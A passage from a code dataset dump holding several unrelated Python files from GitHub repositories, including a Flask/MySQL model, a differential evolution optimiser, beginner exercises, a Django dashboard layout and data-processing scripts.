if parent.get(d) is None and root == dst_path]\n [__load_files__(f) for f in files if root == dst_path]\n\n load_data_objects(self._data, data_path)\n return self._data\n\n @property\n def tags(self):\n tag_strings = [p.meta.get('tags', '') for p in current_app.pages if p._has_tags]\n if is_none(tag_strings) or tag_strings == []:\n return []\n\n tags = (','.join(tag_strings)).split(',')\n tmp = []\n [(lambda c: (not (c in tmp)) and tmp.append(c))(tag) for tag in tags]\n return tmp\n\n @property\n def archives(self, locale=''):\n from itertools import groupby\n from operator import itemgetter\n\n _posts = [('%s-%s' % (p.published.year, p.published.month), p.path) for p in self.posts if\n (datetime.now() - p.published).days > 30 and p._locale == locale]\n\n _archives = []\n for key, val in groupby(sorted(_posts, reverse=True, key=itemgetter(0)), itemgetter(0)):\n archive = Archive(title=key, count=0)\n for i in val:\n archive.count += 1\n _archives.append(archive)\n\n return _archives","repo_name":"DotNetAge/freezes","sub_path":"freezes/sites.py","file_name":"sites.py","file_ext":"py","file_size_in_byte":6975,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"37530683034","text":"palavra = 'Carne'.upper(),'Sarna'.upper(),'Sarrar'.upper(),'Sorte'.upper(),'Peido'.upper()\nvogais = 'A', 'E', 'I', 'O', 'U'\n\nfor pos , c in enumerate(palavra):\n print(f'{c} vogais são: ', end='')\n for d in range(0,len(c)):\n if c[d] in vogais:\n print(f'{c[d]}',end='')\n print('')\n\n\n","repo_name":"Natanael-Marlon/Python3_Curso_em_Video","sub_path":"ex077.py","file_name":"ex077.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"27750779324","text":"from synchrony import log, db\nfrom synchrony.models import UserGroup, Priv, Acl\n\ndef init_user_groups():\n \"\"\"\n Administrators:\n see_all\n delete_at_will\n reset_user_pw\n modify_user\n modify_usergroup\n deactivate\n manage_networks\n review_downloads\n toggle_signups\n Users:\n chat\n initiate_rtc\n create_revision\n retrieve_from_dht\n browse_peer_nodes\n retrieve_resource\n stream_document\n\n There's also a secret privilege called \"eval\" that we don't create but is\n checked for in streams.chat.on_cmd. Perhaps make a special UserGroup for\n yourself.\n \"\"\"\n # Bans happen by setting User.active to False and clearing their existing sessions.\n groups = [\"Administrators\", \"Users\"]\n admin_privs = [ \"see_all\", \"delete_at_will\", \"reset_user_pw\", \"modify_user\",\n \"modify_usergroup\", \"deactivate\", \"manage_networks\",\n \"review_downloads\", \"toggle_signups\"] \n privs = [ \"create_revision_group\", \"delete_revision_group\", \"chat\",\n \"initiate_rtc\", \"create_revision\", \"retrieve_from_dht\", \n \"browse_peer_nodes\", \"retrieve_resource\", \"stream_document\"]\n\n privs.extend(admin_privs)\n\n if not Priv.query.first():\n log(\"Creating privileges.\")\n\n for priv in privs:\n p = Priv.query.filter(Priv.name == priv).first()\n if not p:\n p = Priv(name=priv)\n db.session.add(p)\n db.session.commit()\n\n for group in groups:\n g = UserGroup.query.filter(UserGroup.name == group).first()\n if not g:\n g = UserGroup(name=group)\n for p in Priv.query.all():\n if group != \"Administrators\" and p.name in admin_privs:\n continue\n a = Acl()\n a.group = g\n a.priv = p\n a.allowed = True\n db.session.add(a)\n db.session.add(p)\n db.session.commit()\n db.session.add(g)\n db.session.commit()\n log(\"Created user group \\\"%s\\\".\" % group)\n\ndef ban(user):\n pass\n\ndef unban(user):\n pass\n","repo_name":"Psybernetics/Synchrony","sub_path":"synchrony/controllers/usergroups.py","file_name":"usergroups.py","file_ext":"py","file_size_in_byte":2315,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"81"} +{"seq_id":"74009546826","text":"\"\"\"\nThe Ultimate Wacky Recipe Maker\n\nWe have learned enough skills for a simple, but cool, project!\n\nRemember when you were a kid and thought the ideal dinner \nwould just be all your favorite things mixed in a bowl? How did that Nutella Mac & Cheese taste? Well - let's come up with a recipe generator to build us an amazing dish for today's evening meal!\n\"\"\"\nfoodType = \"chinese food\"\nplantType = \"daisy\"\ncookingMethod = \"steamed\"\ndesc = \"denied\"\nitem = \"fork\"\n\nprint(\"Menu \\n Today we have some\", cookingMethod, \"\\n\", \n foodType, \" that is served \\n with a\", plantType, \" and\", \n item, \".\\n Our food is never\", desc, \"!\")\n","repo_name":"AlfonsoTorrez/PythonLearning","sub_path":"python03/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"41755666974","text":"import glob\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport itertools\nimport pickle\nimport sys\nimport time\nsys.path.append(\"..\")\nfrom demo_2_awac import och_2_awac\ndata_dirs = ['/usr/local/google/home/abhishekunique/sim_franka/rpl_reset_free/recordings/play_targetrelabeled_MCS3.pkl',\n '/usr/local/google/home/abhishekunique/sim_franka/rpl_reset_free/recordings/play_targetrelabeled_MCS2.pkl',\n '/usr/local/google/home/abhishekunique/sim_franka/rpl_reset_free/recordings/play_targetlabeled_MCS1.pkl',\n '/usr/local/google/home/abhishekunique/sim_franka/rpl_reset_free/recordings/play_targetlabeled_MCS0.pkl',]\n\no_size = 13\nall_demos = []\nadjacency_matrix = np.zeros((8,8))\nlabeled_goals = [[] for _ in range(8)]\nlabeled_demos = [[] for _ in range(8)]\n\nfor di, data_dir in enumerate(data_dirs):\n demos = pickle.load(open(data_dir, 'rb'))\n demos = och_2_awac(demos)\n\n segment_idxs = []\n\n range_objs = [0.1, 0.1, 0.05, 0.05]\n for demo in demos:\n max_objs = np.array([0.25, 1, 0.75, -0.05])\n min_objs = np.array([0.1, 0.1, 0.15, -0.2])\n curr_segment_idx = []\n init_pos = demo['observations'][0, 2:6]\n init_bitflip = np.array([0, 0, 0, 1])\n for j in range(4):\n if init_pos[j] > max_objs[j]:\n init_bitflip[j] = 1\n elif init_pos[j] < min_objs[j]:\n init_bitflip[j] = 0\n final_pos = demo['observations'][-1, 2:6]\n final_bitflip = init_bitflip.copy()\n for j in range(4):\n if final_pos[j] > max_objs[j]:\n final_bitflip[j] = 1\n elif final_pos[j] < min_objs[j]:\n final_bitflip[j] = 0\n\n old_idx = 4*init_bitflip[0] + 2*init_bitflip[2] + init_bitflip[3]\n new_idx = 4 * final_bitflip[0] + 2 * final_bitflip[2] + final_bitflip[3]\n labeled_goals[int(new_idx)].append(demo['observations'][-1, :13])\n adjacency_matrix[int(old_idx), int(new_idx)] += 1\n\n goal = demo['observations'][-1, :o_size].copy()\n demo['observations'][:, o_size:] = goal.copy()\n demo['next_observations'][:, o_size:] = goal.copy()\n all_demos.append(demo)\n labeled_demos[int(old_idx)].append(demo)\n\n\n # import gym\n # import adept_envs\n # env = gym.make(\"franka_microwave_cabinet_slider-v1\")\n # for demo in demos:\n # qp_reset = demo['observations'][-1]\n # mocap_reset = demo['observations'][-1, 6:9]\n # env.sim.data.qpos[7:9] = qp_reset[:2].copy()\n # env.sim.data.qpos[9:13] = qp_reset[2:6].copy()\n # env.sim.data.mocap_pos[:] = mocap_reset.copy()\n # for _ in range(100):\n # env.sim.step()\n # env.render()\n # time.sleep(2)\n\n# plt.imshow(adjacency_matrix)\n# locs, labels = plt.xticks()\n# label_list = itertools.product(['SC', 'SO'], ['CC','CO'], ['MO', 'MC'])\n# label_list = ['-'.join(s) for s in label_list]\n# plt.yticks(np.arange(8), label_list)\n# plt.xticks(np.arange(8), label_list, rotation=90)\n# plt.show()\nfor i in range(8):\n pickle.dump(labeled_demos[i], open('segmentedcollectedplay_microwave_cabinent_slider_perstart_%d.pkl'%i, 'wb'))\npickle.dump(all_demos, open('segmentedcollectedplay_microwave_cabinent_slider.pkl', 'wb'))","repo_name":"google-research/DBAP-algorithm","sub_path":"third_party/rlkit_library/scripts/dump_adjacency_goals.py","file_name":"dump_adjacency_goals.py","file_ext":"py","file_size_in_byte":3262,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"7131281037","text":"from flask_app.config.mysqlconnection import connectToMySQL\n\n\n\n\n\n\nclass Ninja:\n DB = 'dojos_and_ninjas_schma'\n\n def __init__(self, data):\n self.id = data['id']\n self.first_name = data['first_name']\n self.last_name = data['last_name']\n self.age = data['age']\n self.created_at = data['created_at']\n self.updated_at = data['updated_at']\n self.dojo_id = data['dojo_id']\n\n\n @classmethod\n def get_all(cls, data):\n query = \"\"\"SELECT * FROM ninjas\n WHERE dojo_id = %(id)s ;\"\"\"\n results = connectToMySQL(cls.DB).query_db(query, data)\n ninjas = []\n for ninja in results:\n ninjas.append( cls(ninja) )\n return ninjas\n\n\n\n @classmethod\n def add_ninja(cls, data):\n query = \"\"\"\n INSERT INTO ninjas (first_name, last_name, age, dojo_id)\n VALUES ( %(first_name)s, %(last_name)s, %(age)s, %(dojo_id)s );\n \"\"\"\n results = connectToMySQL(cls.DB).query_db(query, data)\n return results\n \n\n @classmethod\n def get_one(cls,data):\n query = \"\"\"\n SELECT * FROM ninjas\n WHERE id = %(id)s ;\n \"\"\"\n results = connectToMySQL(cls.DB).query_db(query, data)\n return cls(results[0])\n\n\n @classmethod\n def update_ninja(cls,data):\n query = \"\"\"\n UPDATE ninjas\n SET first_name = %(first_name)s, last_name = %(last_name)s, age = %(age)s, dojo_id = %(dojo_id)s \n WHERE id = %(ninja_id)s ;\n \"\"\"\n results = connectToMySQL(cls.DB).query_db(query, data)\n return results\n\n\n @classmethod\n def delete_ninja(cls,data):\n query = \"\"\"\n DELETE FROM ninjas WHERE id = %(ninja_id)s ;\n \"\"\"\n results = connectToMySQL(cls.DB).query_db(query, data)\n return results\n\n\n @classmethod\n def ninja_data(cls,data):\n query = \"\"\"\n SELECT * FROM ninjas\n WHERE id = %(ninja_id)s ;\n \"\"\"\n results = connectToMySQL(cls.DB).query_db(query, data)\n return cls (results[0])\n\n","repo_name":"AlekseyKashubin/dojos_and_ninjas","sub_path":"flask_app/models/ninja_model.py","file_name":"ninja_model.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"855874098","text":"#!/usr/bin/python3\n\"\"\"Defines a function to divide matrix elements\"\"\"\n\n\ndef matrix_divided(matrix, div):\n \"\"\" Function that divides the integer/float numbers of a matrix\n Args:\n matrix: list of a lists of integers/floats\n div: number to divide by\n Raises:\n TypeError: If the matrix contains non-numbers\n If the matrix contains rows of different sizes\n If div is not an int or float.\n ZeroDivisionError: If div is zero\n Returns:\n A new matrix with the result of the division\n \"\"\"\n\n matlength = 0\n\n if not isinstance(div, (int, float)):\n raise TypeError(\"div must be a number\")\n\n err = \"matrix must be a matrix (list of lists) of integers/floats\"\n\n if not matrix or not isinstance(matrix, list):\n raise TypeError(err)\n\n if div == 0:\n raise ZeroDivisionError(\"division by zero\")\n\n if not matrix or not isinstance(matrix, list):\n raise TypeError(err)\n\n for value in matrix:\n if not value or not isinstance(value, list):\n raise TypeError(err)\n\n if matlength != 0 and len(value) != matlength:\n raise TypeError(\"Each row of the matrix must have the same size\")\n\n for num in value:\n if not isinstance(num, (int, float)):\n raise TypeError(err)\n\n matlength = len(value)\n\n s = list(map(lambda x: list(map(lambda y: round(y / div, 2), x)), matrix))\n return (s)\n","repo_name":"franklinetush1/alx-higher_level_programming","sub_path":"0x07-python-test_driven_development/2-matrix_divided.py","file_name":"2-matrix_divided.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"28927237374","text":"import sys\r\n\r\ndataFile = open('WBC.data', 'r').read()\r\ndataDic = {i.split(',')[0]: i.split(',')[1:] for i in dataFile.split('\\n')}\r\n\r\ndef funDataClean():\r\n\r\n global dataDic\r\n\r\n missingValues = []\r\n\r\n for key, val in dataDic.items():\r\n for j in range(len(val)):\r\n if val[j] == '?':\r\n val[j] = calcMissing(j, val[9])\r\n missingValues.append(val[j])\r\n dataDic[key] = val\r\n\r\n return sum(missingValues) / len(missingValues)\r\n\r\n\r\ndef calcMissing(index, category):\r\n indexSum = []\r\n\r\n for key, val in dataDic.items():\r\n for k in range(len(val) - 1):\r\n if val[index] != '?' and val[9] == category:\r\n indexSum.append(int(val[index]))\r\n\r\n return round(sum(indexSum) / len(indexSum))\r\n\r\ndef performStepWiseSearch(args):\r\n global dataDic\r\n\r\n argl = args.split(',')\r\n for i in range(len(argl)):\r\n if argl[i] == '?':\r\n continue\r\n else:\r\n argt = argl[i].split(':')\r\n c = int(argt[1])\r\n if argt[0] == '<':\r\n dataDic = dict({k: v for k, v in dataDic.items() if int(v[i]) < c})\r\n if argt[0] == '<=':\r\n dataDic = dict({k: v for k, v in dataDic.items() if int(v[i]) <= c})\r\n if argt[0] == '>':\r\n dataDic = dict({k: v for k, v in dataDic.items() if int(v[i]) > c})\r\n if argt[0] == '>=':\r\n dataDic = dict({k: v for k, v in dataDic.items() if int(v[i]) >= c})\r\n if argt[0] == '!=':\r\n dataDic = dict({k: v for k, v in dataDic.items() if int(v[i]) != c})\r\n if argt[0] == '=':\r\n dataDic = dict({k: v for k, v in dataDic.items() if int(v[i]) == c})\r\n\r\nprint('The average of all missing values is : ' + '{0:.4f}'.format(funDataClean()))\r\n\r\nperformStepWiseSearch(sys.argv[1])\r\n\r\ncaseMalignant = len(dict({k: v for k, v in dataDic.items() if v[9] == 'malignant'}))\r\ncaseBenign = len(dict({k: v for k, v in dataDic.items() if v[9] == 'benign'}))\r\n\r\nprint('\\nTest Results:\\n'\r\n '----------------------------------------------'\r\n '\\nPositive (malignant) cases : ' + str(caseMalignant) +\r\n '\\nNegative (benign) cases : ' + str(caseBenign) +\r\n '\\nThe probability of being positive : ' + '{0:.4f}'.format(caseMalignant / len(dataDic)) +\r\n '\\n----------------------------------------------')\r\n","repo_name":"b21627868/drafts","sub_path":"malignant benign mehmet abi.py","file_name":"malignant benign mehmet abi.py","file_ext":"py","file_size_in_byte":2439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4980149730","text":"import os\nimport django\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE','covid19.settings')\ndjango.setup()\n\nfrom pandas import read_json, read_csv\nfrom datetime import date\nfrom numpy import inf, nan\nfrom time import ctime, time\nfrom report.models import Country, WeekReport\n\ndef report(df,region_dict,label_dict):\n '''\n This function will manipulate the country_report.json file in order to obtain\n the dataframe with the columns representing the models.WeekReport attributes\n\n region_dict and label_dict are dictionaries necessary for data transformation\n '''\n\n df_aux = df.copy()[['Country/Region','Date']]\n df_aux['Country/Region'] = df_aux['Country/Region'].transform(lambda x: label_dict[x] if x in label_dict.keys() else x)\n df_aux['week'] = df_aux['Date'].transform(lambda x:date(x.year, x.month, x.day).strftime('%Y-%U'))\n\n column_names = ['Confirmed','Deaths']\n for column in column_names:\n df_aux[column] = df[column + '_new_cases']\n\n df_aux = df_aux.groupby(['Country/Region','week']).sum().reset_index()\n for column in column_names:\n df_aux[column] = df_aux[column].transform(lambda x:max(x,0))\n\n df_aux['region'] = df_aux['Country/Region'].transform(lambda x: region_dict[x] if x in region_dict.keys() else x)\n\n for column in column_names:\n df_aux[column + '_pct_change'] = df_aux.groupby('Country/Region')[column].pct_change()*100\n df_aux[column + '_pct_change'].replace(to_replace=[-inf, inf],value=nan,inplace=True)\n df_aux[column + '_pct_change'].fillna(value=0,inplace=True)\n\n df_aux[column + '_rank_world'] = df_aux.groupby('week')[column].rank(method='min',ascending=False)\n df_aux[column + '_rank_region'] = df_aux.groupby(['week','region'])[column].rank(method='min',ascending=False)\n\n df_aux['last_update'] = df['Date'].max()\n df_aux['last_update'] = df_aux['last_update'].transform(lambda x:date(x.year,x.month,x.day))\n\n return df_aux\n\n\ndef update_db(df,modeldb):\n # Updating selected objects attributes:\n for obj in modeldb:\n param = df.loc[df['Country/Region'] == obj.country.name]\n\n obj.week=param.week.values[0]\n obj.confirmed=int(param.Confirmed.values[0])\n obj.confirmed_pct_change=float(param.Confirmed_pct_change.values[0])\n obj.confirmed_rank_region=int(param.Confirmed_rank_region.values[0])\n obj.confirmed_rank_world=int(param.Confirmed_rank_world.values[0])\n obj.deaths=int(param.Deaths.values[0])\n obj.deaths_pct_change=float(param.Deaths_pct_change.values[0])\n obj.deaths_rank_region=int(param.Deaths_rank_region.values[0])\n obj.deaths_rank_world=int(param.Deaths_rank_world.values[0])\n obj.last_update=param.last_update.values[0]\n\n obj.save()\n print('{} updated in database'.format(obj.country.name))\n\n\ndef insert_db(df,countries_list):\n print('Inserting all countries in the list to models.WeekReport')\n\n for item in countries_list:\n country = Country.objects.filter(name=item)\n\n if country.exists():\n df_info = df.loc[df['Country/Region']==item]\n for i in df_info.index:\n param = df_info.loc[i]\n entry = WeekReport.objects.get_or_create(country=country[0],\n week=param.week,\n confirmed=param.Confirmed,\n confirmed_pct_change=param.Confirmed_pct_change,\n confirmed_rank_region=int(param.Confirmed_rank_region),\n confirmed_rank_world=int(param.Confirmed_rank_world),\n deaths=param.Deaths,\n deaths_pct_change=param.Deaths_pct_change,\n deaths_rank_region=int(param.Deaths_rank_region),\n deaths_rank_world=int(param.Deaths_rank_world),\n last_update=param.last_update)[0]\n\n entry.save()\n print('{} inserted into models.WeekReport'.format(item))\n else:\n print(item + ' is not on Country.models')\n\n\ndef main():\n def db_del(database,confirm_before=True):\n # This function delete all entries in \"database\" model\n\n flag = True\n\n if confirm_before:\n confirm_delete = input('This will erase all entries in models.WeekReport. Press \"n\" if you wish to skip delete or any other key to continue: ')\n\n if confirm_delete == 'n':\n flag = False\n else:\n pass\n\n if flag:\n database.objects.all().delete()\n print('All entries in models.{} deleted succesfully!'.format(database))\n else:\n print('No modifications on database.')\n pass\n\n try:\n # In the config.csv file, on 'countryinfo_file' row of columns 'var':\n # - aux1: Set 0, for delete all entries in database or 1 for add/update entries;\n # - aux2: Set 0, for reload database from 'country_report.json' file or 1 for update existing entries;\n # - aux3: Set 1, for confirmation need in case aux1 is set to 0;\n\n log_dbWeekReport=[]\n log_dbWeekReport.append('\\n----------dbWeekReport.py SCRIPT EXECUTION REPORT-----------\\n')\n log_dbWeekReport.append('\\n'+ 'Local time: ' + ctime() + '\\n\\n')\n\n task = config.loc['week_report'].aux1\n update = config.loc['week_report'].aux2\n confirm_value=config.loc['week_report'].aux3\n\n if not task: # This will delete the entire WeekReport database\n db_del(WeekReport,confirm_before=confirm_value)\n\n else: # This will update or create the WeekReport database\n\n # ---------------------------\n # Reading Configuration files\n country_report = os.path.join(config.loc['week_report'].file_path,\n config.loc['week_report'].file_name)\n\n country_table_file = os.path.join(config.loc['countryinfo_file'].file_path,\n config.loc['countryinfo_file'].file_name)\n\n label_map_file = os.path.join(config.loc['labelmap_file'].file_path,\n config.loc['labelmap_file'].file_name)\n\n countries_table = read_csv(country_table_file,index_col='Country')\n\n #--------------------- ---------------------------\n # reading region dictionary and labels dictionary:\n region_dict = countries_table['Region'].to_dict()\n label_dict = read_csv(label_map_file,header=None,index_col=0).to_dict()[1]\n\n # -----------------------------------\n # Creating the week_report dataframe\n print(\"Reading 'country_report.json' file\")\n df = read_json(country_report)\n\n print(\"Creating week report table\")\n\n week_report = report(df,region_dict,label_dict)\n countries_list = week_report['Country/Region'].unique()\n\n print(\"week_report table generated succesfully!\")\n\n # =================================================================\n\n if update:\n start_time = time() # Let's check the execution time of the database update\n\n # =================================================================\n # Now, let's compare the latest week in table with the latest week\n # in database. If they are the same, update is enabled. Otherwise, a\n # database insert query is called:\n\n db_last_week = WeekReport.objects.order_by('-week')[0].week\n\n x = week_report.last_update.max()\n report_last_week = date(x.year, x.month, x.day).strftime('%Y-%U')\n\n if db_last_week == report_last_week:\n flag_update = 'update'\n else:\n year_in_report = int(report_last_week[:4])\n year_in_db = int(db_last_week[:4])\n\n week_in_report = int(report_last_week[-2:])\n week_in_db = int(db_last_week[-2:])\n\n if year_in_report < year_in_db:\n flag_update = 'ahead'\n else:\n if week_in_report > week_in_db:\n flag_update = 'insert'\n else:\n flag_update = 'ahead'\n\n print('updating all entries in models.WeekReport')\n\n # Once update is enabled, the week_report dataframe will be filtered\n # to the last 'year-week' and the objects in database will be filtered\n # to those in the same year-week in order to save memory resources:\n if flag_update == 'update':\n df = week_report.loc[week_report['week']==db_last_week]\n modeldb = WeekReport.objects.filter(week=db_last_week)\n\n update_db(df,modeldb)\n elif flag_update == 'insert':\n # In case there's a difference between weeks or years between\n # the report and the database, first we update the last week\n # in the database and then we insert the other weeks new objects\n\n # 1 - Update last week in database:\n df = week_report.loc[week_report['week']==db_last_week]\n modeldb = WeekReport.objects.filter(week=db_last_week)\n\n update_db(df,modeldb)\n\n # 2 - Insert new week(s) in database:\n df = week_report.loc[week_report['week'] > db_last_week]\n insert_db(df,countries_list)\n else:\n log_dbWeekReport.append('\\n models.WeekReport is ahead of report. No action taken. \\n')\n pass\n\n log_dbWeekReport.append('\\n models.WeekReport updated succesfully \\n')\n log_dbWeekReport.append('\\n database update execution time: {:.2f}sec \\n'.format(time()-start_time))\n else:\n start_time = time()\n\n db_del(WeekReport,confirm_before=confirm_value)\n insert_db(week_report,countries_list)\n\n log_dbWeekReport.append('\\n models.WeekReport populated succesfully \\n')\n log_dbWeekReport.append('\\n database creation execution time: {:.2f}sec \\n'.format(time()-start_time))\n\n message = 'Script executed succesfully!'\n print(message)\n log_dbWeekReport.append('\\n Most recent week on report: {} \\n'.format(WeekReport.objects.order_by('-week')[0].week))\n log_dbWeekReport.append('\\n {} \\n'.format(message))\n except:\n message = 'Something went wrong! The script was not executed'\n print(message)\n log_dbWeekReport.append('\\n {} \\n'.format(message))\n finally:\n message = 'End of execution of the dbWeekReport.py script'\n print(message)\n log_dbWeekReport.append('\\n {} \\n'.format(message))\n\n os.chdir(log_dir)\n\n log = open('log_dbWeekReport.txt','w')\n log.writelines(log_dbWeekReport)\n log.close()\n\n\n\nif __name__ == '__main__':\n script_start_time = time()\n\n config_filepath = r\"C:\\Users\\user\\Documents\\GitHub\\django\\covid19\\static\\report\\config\"\n log_dir = r'C:\\Users\\user\\Documents\\GitHub\\django\\covid19\\static\\report\\log'\n\n if 'config.csv' in os.listdir(config_filepath):\n print('Reading configuration file')\n config = read_csv(os.path.join(config_filepath,'config.csv'),index_col='var').fillna('-')\n else:\n raise FileNotFoundError('No configuration file \"config.csv\" found.')\n\n country_report = os.path.join(config.loc['week_report'].file_path,\n config.loc['week_report'].file_name)\n\n last_modified = config.loc['week_report'].aux4\n current_date = ctime(os.path.getmtime(country_report))\n\n if current_date == last_modified and False:\n log_dbWeekReport=[]\n log_dbWeekReport.append('\\n----------dbWeekReport.py SCRIPT EXECUTION REPORT-----------\\n')\n log_dbWeekReport.append('\\n'+ 'Local time: ' + ctime() + '\\n\\n')\n log_dbWeekReport.append('\\n --> current file has not been modified. Nothing to do here.')\n\n log_dir = r'C:\\Users\\user\\Documents\\GitHub\\django\\covid19\\static\\report\\log'\n os.chdir(log_dir)\n\n log = open('log_dbWeekReport.txt','w')\n log.writelines(log_dbWeekReport)\n log.close()\n\n print('No necessary actions for the current file')\n pass\n else:\n main()\n\n os.chdir(config_filepath)\n config.loc['week_report','aux4'] = current_date\n config.to_csv('config.csv')\n\n os.chdir(log_dir)\n\n log = open('log_dbWeekReport.txt','a')\n log.writelines('\\n Script execution time: {:.2f}sec \\n'.format(time() - script_start_time))\n log.close()\n","repo_name":"psychopresley/django","sub_path":"covid19/report/Backup_templates/Ongoing/dbWeekReport.py","file_name":"dbWeekReport.py","file_ext":"py","file_size_in_byte":13260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"19994314799","text":"import math\nimport random\n\nimport numpy as np\n\nfrom ..algorithm_common import AlgorithmCommon as AC\nfrom ..algorithm_common import IAlgorithm\n\n\nclass DE(IAlgorithm):\n def __init__(self,\n agent_max,\n crossover_rate=0.5,\n scaling=0.5,\n ):\n self.agent_max = agent_max\n self.crossover_rate = crossover_rate\n self.scaling = scaling\n\n def init(self, problem):\n self.problem = problem\n self.count = 0\n\n self.agents = []\n for _ in range(self.agent_max):\n self.agents.append(problem.create())\n\n def getMaxElement(self):\n self.agents.sort(key=lambda x: x.getScore())\n return self.agents[-1]\n\n def getElements(self):\n return self.agents\n \n def step(self):\n\n for i, agent in enumerate(self.agents):\n\n # iを含まない3個体をランダムに選択\n r1, r2, r3 = random.sample([ j for j in range(len(self.agents)) if j != i ], 3)\n pos1 = self.agents[r1].getArray()\n pos2 = self.agents[r2].getArray()\n pos3 = self.agents[r3].getArray()\n\n # 3個体から変異ベクトルをだす\n m_pos = pos1 + self.scaling * (pos2 - pos3)\n\n # 変異ベクトルで交叉させる(一様交叉)\n pos = agent.getArray()\n ri = random.randint(0, len(pos)) # 1成分は必ず変異ベクトル\n for j in range(len(pos)):\n if ri == j or random.random() < self.crossover_rate:\n pos[j] = m_pos[j]\n else:\n pass # 更新しない\n\n # 優れている個体なら置き換える\n new_agent = self.problem.create(pos)\n self.count += 1\n if agent.getScore() < new_agent.getScore():\n self.agents[i] = new_agent\n\n","repo_name":"pocokhc/metaheuristics","sub_path":"codes/algorithms/DE.py","file_name":"DE.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"81"} +{"seq_id":"27632981361","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nfrom indicoio import personas\nfrom .indico_text_base import TextTest\n\nclass PersonasTest(TextTest):\n\n def test_batch_personas(self):\n test_string = \"I love my friends!\"\n response = personas([test_string,test_string])\n self.assertTrue(isinstance(response, list))\n self.assertIsInstance(response[0][\"commander\"], float)\n self.assertEqual(response[0][\"commander\"], response[1][\"commander\"])\n\n def test_personas(self):\n test_string = \"I love my friends!\"\n response = personas(test_string)\n\n self.assertTrue(isinstance(response, dict))\n self.assertIsInstance(response[\"commander\"], float)\n","repo_name":"EliabWoldeyes/Qhacks2017","sub_path":"IndicoIo-Python/tests/text/test_personas.py","file_name":"test_personas.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"12304075626","text":"from dash.base import BaseDashboardLayout, BaseDashboardPlaceholder\nfrom dash.base import layout_registry\n\n\nclass ExampleMainPlaceholder(BaseDashboardPlaceholder):\n uid = 'main' # Unique ID of the placeholder.\n cols = 6 # Number of columns in the placeholder.\n rows = 5 # Number of rows in the placeholder.\n cell_width = 150 # Width of a single cell in the placeholder.\n cell_height = 110 # Height of a single cell in the placeholder.\n \nclass ExampleShortcutsPlaceholder(BaseDashboardPlaceholder):\n uid = 'shortcuts' # UID of the placeholder.\n cols = 1 # Number of columns in the placeholder.\n rows = 10 # Number of rows in the placeholder.\n cell_width = 60 # Width of a single cell in the placeholder.\n cell_height = 55 # Height of a single cell in the placeholder.\n \nclass ExampleLayout(BaseDashboardLayout):\n uid = 'example' # Layout UID.\n name = 'Example' # Layout name.\n\n # View template. Master template used in view mode.\n view_template_name = 'example/view_layout.html'\n\n # Edit template. Master template used in edit mode.\n edit_template_name = 'example/edit_layout.html'\n\n # All placeholders listed. Note, that placeholders are rendered in the\n # order specified here.\n placeholders = [ExampleMainPlaceholder, ExampleShortcutsPlaceholder]\n\n # Cell units used in the entire layout. Allowed values are: 'px', 'pt',\n # 'em' or '%'. In the ``ExampleMainPlaceholder`` cell_width is set to 150.\n # It means that in this particular case its' actual width would be `150px`.\n cell_units = 'px'\n\n # Layout specific CSS.\n media_css = ('css/dash_layout_example.css',)\n\n # Layout specific JS.\n media_js = ('js/dash_layout_example.js',)\n\n# Registering the layout.\nlayout_registry.register(ExampleLayout)","repo_name":"PirateLearner/pi","sub_path":"dashboard/dash_layout.py","file_name":"dash_layout.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"23790413379","text":"'''\r\nGiven a mixed array of number and string representations of integers, add up the string integers and subtract this from the total of the non-string integers.\r\n\r\nReturn as a number.\r\n'''\r\n\r\ndef div_con(x):\r\n int_list = []\r\n int_total = 0\r\n nonint_list = []\r\n nonint_total = 0\r\n for item in x:\r\n if type(item) == int:\r\n int_list.append(item)\r\n elif type(item) == str:\r\n nonint_list.append(item)\r\n for y in int_list:\r\n int_total += y\r\n for z in nonint_list:\r\n nonint_total += int(z) \r\n return(int_total - nonint_total)","repo_name":"ttommytrinh/Codewars-Kata","sub_path":"Divide_And_Conquer.py","file_name":"Divide_And_Conquer.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"11751199929","text":"class Solution(object):\n def reverseVowels(self, s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n is_vowel = []\n l_vowel = []\n res = ''\n for c in s:\n c_is_vowel = c in ['a', 'e', 'i', 'o', 'u', 'A', 'E', 'I', 'O', 'U']\n is_vowel.append(c_is_vowel)\n if c_is_vowel:\n l_vowel.append(c)\n l_vowel.reverse()\n vowel_count = 0\n for i, c in enumerate(s):\n if is_vowel[i]:\n res += l_vowel[vowel_count]\n vowel_count += 1\n else:\n res += c\n return res","repo_name":"fanzeng/Leetcode","sub_path":"345/345_Reverse_Vowels_of_a_String.py","file_name":"345_Reverse_Vowels_of_a_String.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"39682688411","text":"# You need to implement the \"get\" and \"head\" functions.\nimport os\nclass 